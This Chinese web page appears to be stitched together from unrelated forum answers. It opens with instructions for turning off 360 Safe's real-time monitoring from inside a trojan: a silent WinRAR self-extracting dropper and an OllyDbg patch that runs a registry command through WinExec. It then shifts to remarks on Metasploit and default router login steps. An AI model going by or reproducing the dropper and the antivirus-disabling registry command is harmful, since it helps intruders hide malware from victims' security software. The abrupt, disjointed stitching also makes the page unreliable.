
BAT代码如下:(代码一贴上来,居然被网站监控为不安全信息,不让发布,晕4)
然后用WINRAR建立自解压文件
路径:c:\windows
解压后运行:vbs文件名.vbs
安静模式:全部隐藏
覆盖方式:覆盖所有文件
做完即可。(二) ASM汇编
这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。
再找一个小空段,记下地址,假设为40116A
写入:
Push 401180 (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点(在OD右边)别人的方法,我没试过,你试一下,如果可以告诉我一下!
因为需要选择相应的exploit和payload,然后还有相关的参数需要手动设置,特别是每个exploit和payload的参数有时并不一样,还有些参数是必须手动设置的,比如在远程主机上添加一个用户,用户名和密码当然就要提前设置。其实Metasploit的攻击方式应该算是半自动化了,你设置好参数后,执行exploit命令不就执行攻击了吗,你说的可能是少了计划任务这样的功能(不过攻击主机也没这样玩的)。电脑进入路由器:1、先查看你的ip,方法:win+r---输入:cmd---在再黑白界面输入:ipconfig,按回车;
2、根据ip查看路由器地址:若你的ip是:192.168.2.100,那么路由器的ip一般就是:192.168.2.1;
3、在IE地址栏中输入地址:192.168.2.1;
4、d出路由器登陆界面输入路由器的默认登陆用户名:admin 密码:admin(不正确的话就看路由器背面);
5、以上方法行不通,在重置路由器;地址,账号,密码都在路由器背面;
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)